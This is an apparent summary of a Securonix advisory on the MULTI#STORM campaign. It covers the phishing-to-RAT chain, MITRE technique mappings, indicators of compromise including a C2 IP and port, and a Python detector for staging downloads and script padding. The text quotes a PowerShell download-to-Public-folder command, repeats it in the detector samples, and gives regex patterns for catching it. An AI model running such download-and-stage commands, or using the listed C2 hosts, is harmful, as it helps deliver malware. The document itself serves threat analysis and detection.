Securonix Threat Labs Security Advisory: New MULTI#STORM Attack Campaign Involving Python-based Loader Masquerading as OneDrive Utilities Dropping Multiple RAT Payloads Using Security Analytics

Keypoints

  • The attack starts with a phishing email containing a link to a OneDrive-hosted file, leading to a password-protected ZIP distribution.
  • A heavily obfuscated REQUEST.js initiates the chain, decoding and running PowerShell one-liners to download additional payloads from OneDrive URLs.
  • The dropper (news.exe) is a PyInstaller-packed Python executable that extracts further components into a public staging directory and establishes persistence.
  • Two shortcut files (Storm.lnk and Exec.lnk) and registry keys are created to maintain startup execution and drop the main RAT (Storm.exe).
  • Storm.exe (Warzone RAT) provides rich capabilities (credential theft, browser data theft, remote access, UAC bypass) and is delivered after the loader neutralizes defenses.
  • Post-exploitation activity includes loading QuasarRAT (quas.exe) and additional cleanup steps from an external server, with multiple C2/infrastructure patterns observed.
  • MITRE-style mappings show a sequence from Phishing to PowerShell/JavaScript execution, obfuscated payloads, registry-based persistence, and encrypted C2 communications via OneDrive and direct IP:port connections.

MITRE Techniques

  • [T1566] Phishing – Initial access via phishing email with a OneDrive download link. ‘The attack kicks off like so many others, with a phishing email which has an embedded link. The link references a request for quote which directs the user to a Microsoft OneDrive file for the victim to download.’
  • [T1204.002] User Execution: Malicious File – Execution initiated when the user double-clicks REQUEST.js. ‘Assuming that the user double clicks the REQUEST.js file, this is where our code execution begins.’
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The loader uses PowerShell one-liners to download and execute files. ‘cmd /c powershell.exe -Command "Invoke-WebRequest -Uri … -OutFile C:\Users\Public\Libraries\files.pdf"’
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The heavily obfuscated REQUEST.js script drives the chain. ‘The JScript file’s code is heavily obfuscated as seen in the figure below.’
  • [T1027.010] Obfuscated Files or Information – Obfuscated script and large padding to hinder analysis. ‘The JScript file’s code is heavily obfuscated… and padding at the end of the script using exactly 509992 zero characters.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via registry keys to run on startup. ‘Persistence on the host is established by the news.exe binary file by creating two registry keys which will execute upon startup.’
  • [T1053.005] Scheduled Task/Job – Listed as an indirect persistence mechanism in the broader tooling suite; the evidence cited is registry-based (‘Creates registry keys which will execute upon startup’), so it is grouped under the persistence family in this context.
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – Encrypted C2 communications within Warzone RAT. ‘Encrypted C2 communication’ described in the payload features.
  • [T1105] Ingress Tool Transfer – OneDrive-based staging of multiple payloads. ‘used Microsoft OneDrive links to stage various payloads.’
  • [T1571] Non-Standard Port – RAT payloads connect to IP:Port combinations designed to evade detection. ‘connect directly to an IP:Port combination, with a fake appended .ddns.net URL.’
  • [T1041] Exfiltration Over C2 Channel – Covert data exfiltration over C2 (implied by RAT capabilities).
  • [T1056.001] Input Capture: Keylogging – RAT capability set includes keylogging among data theft features. ‘Keylogging’ listed in the capability set.
  • [T1113] Screen Capture – RAT can capture screens as part of credential theft collection. ‘Screen Capture’ listed in the capability set.
  • [T1115] Clipboard Data – Clipboard data access as part of credential theft. ‘Clipboard Data’ listed in the capability set.
  • [T1119] Automated Collection – Automated data collection through the RAT.
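As an added example (not code from the Securonix advisory), a small Python detection helper for two of the observable behaviors listed above: a PowerShell download cmdlet writing its output into the C:\Users\Public staging tree, and a script carrying a huge trailing run of a single padding character. The sample command lines and the padded script stand-in are constructed for the demonstration.

```python
import re

# Constructed sample process-creation command lines (not taken from the advisory).
SAMPLE_CMDLINES = [
    'cmd /c powershell.exe -Command "Invoke-WebRequest -Uri '
    'https://onedrive.live.com/download?id=CONSTRUCTED -OutFile '
    'C:\\Users\\Public\\Libraries\\files.pdf"',
    'powershell.exe -Command "Get-ChildItem C:\\Users\\alice\\Documents"',
    'powershell.exe -Command "Invoke-WebRequest -Uri https://example.invalid/a '
    '-OutFile C:\\Users\\alice\\Downloads\\a.txt"',
]

# Constructed stand-in for REQUEST.js: a tiny script followed by the same
# 509992-character run of '0' padding the advisory describes.
SAMPLE_PADDED_JS = "var a=1;\n" + "0" * 509992

# Invoke-WebRequest and its built-in alias iwr.
DOWNLOAD_CMDLET = re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.IGNORECASE)
# -OutFile pointing into the world-writable C:\Users\Public tree.
PUBLIC_OUTFILE = re.compile(r"-OutFile\s+\"?C:\\Users\\Public\\", re.IGNORECASE)


def flag_staging_download(cmdline: str) -> bool:
    """True when a PowerShell download cmdlet writes its output into
    C:\\Users\\Public, the staging directory used by the MULTI#STORM loader."""
    return bool(DOWNLOAD_CMDLET.search(cmdline) and PUBLIC_OUTFILE.search(cmdline))


def trailing_pad_run(script: str) -> int:
    """Length of the run of one repeated character at the end of the script,
    ignoring a final newline; large values indicate analysis-evading padding."""
    body = script.rstrip("\r\n")
    if not body:
        return 0
    last = body[-1]
    run = 0
    while run < len(body) and body[-1 - run] == last:
        run += 1
    return run


def flag_padded_script(script: str, threshold: int = 100_000) -> bool:
    """Flag scripts whose trailing single-character padding reaches threshold."""
    return trailing_pad_run(script) >= threshold


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(flag_staging_download(line), line[:60])
    print(trailing_pad_run(SAMPLE_PADDED_JS), flag_padded_script(SAMPLE_PADDED_JS))
```

The threshold is a tunable starting point; legitimate minified scripts rarely end in a run of one character anywhere near that long.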

Indicators of Compromise

  • [URL] OneDrive download links used to stage payloads – example: hxxps://onedrive.live[.]com/download?… (and other listed OneDrive URLs)
  • [IP] Direct RAT connection targets – example: 134.19.179.147:38046/dominion46.ddns[.]net, 134.19.179.147:29185/dominion46.ddns[.]net
  • [Domain] ddns.net hostnames used in conjunction with IPs – example: dominion46.ddns.net
  • [File name] Dropper and payload files – examples: REQUEST.zip, REQUEST.js, news.exe, files.pdf, S.exe, Storm.exe, quas.exe
  • [SHA256] File hashes for known artifacts – examples: REQUEST.zip (8674817912be90a09c5a0840cd2dff2606027fe8843eb868929fc33935f5511e), REQUEST.js (3783acc6600b0555dec5ee8d3cc4d59e07b5078dd33082c5da279a240e7c0e79), news.exe (18C876A24913EE8FC89A146EC6A6350CDC4F081AC93C0477FF8FC054CC507B75)
  • [File name] Shortcuts and LNKs used for persistence – examples: Storm.lnk, Exec.lnk
  • [File name] Internet shortcut (.url) files used for persistence – examples: OneDrive Update.url, OneDrive.url

Read more: https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/